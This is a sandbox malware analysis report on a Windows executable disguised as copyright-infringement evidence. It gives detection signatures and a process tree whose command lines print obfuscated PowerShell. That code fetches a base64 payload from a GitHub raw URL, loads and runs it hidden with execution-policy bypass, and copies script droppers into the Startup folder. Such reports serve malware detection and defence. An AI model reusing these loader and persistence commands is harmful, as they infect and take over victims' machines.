Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
copyright_infringement_evidence_1.exe

Overview

General Information

Sample name:copyright_infringement_evidence_1.exe
Analysis ID:1528568
MD5:8c04e5d5adaf15173fecd9384ceda14d
SHA1:9cbcf5134cfecb1a1f0c7e615a2a973ed8381e54
SHA256:31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad
Tags:exeXiamenHuixiantongNetworkTechnologyCoLtduser-SquiblydooBlog
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Drops script or batch files to the startup folder
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • copyright_infringement_evidence_1.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\copyright_infringement_evidence_1.exe" MD5: 8C04E5D5ADAF15173FECD9384CEDA14D)
    • cmd.exe (PID: 5036 cmdline: "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 2676 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 6008 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 1716 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,2238789325032490654,13057371531959611122,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • wscript.exe (PID: 7404 cmdline: "wscript.exe" C:\Users\Public\Documents\2p_bee.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 7956 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 8024 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • powershell.exe (PID: 6688 cmdline: powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7412 cmdline: "cmd" /C echo %username% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 7424 cmdline: "wscript.exe" C:\Users\Public\Documents\2x_bee.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 7856 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 7944 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • powershell.exe (PID: 6000 cmdline: powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 8044 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7544 cmdline: "cmd" /C echo %username% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5300 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 8172 cmdline: wscript.exe "C:\Users\Public\Documents\2p_bee.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 1292 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 5316 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • powershell.exe (PID: 8344 cmdline: powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 8712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
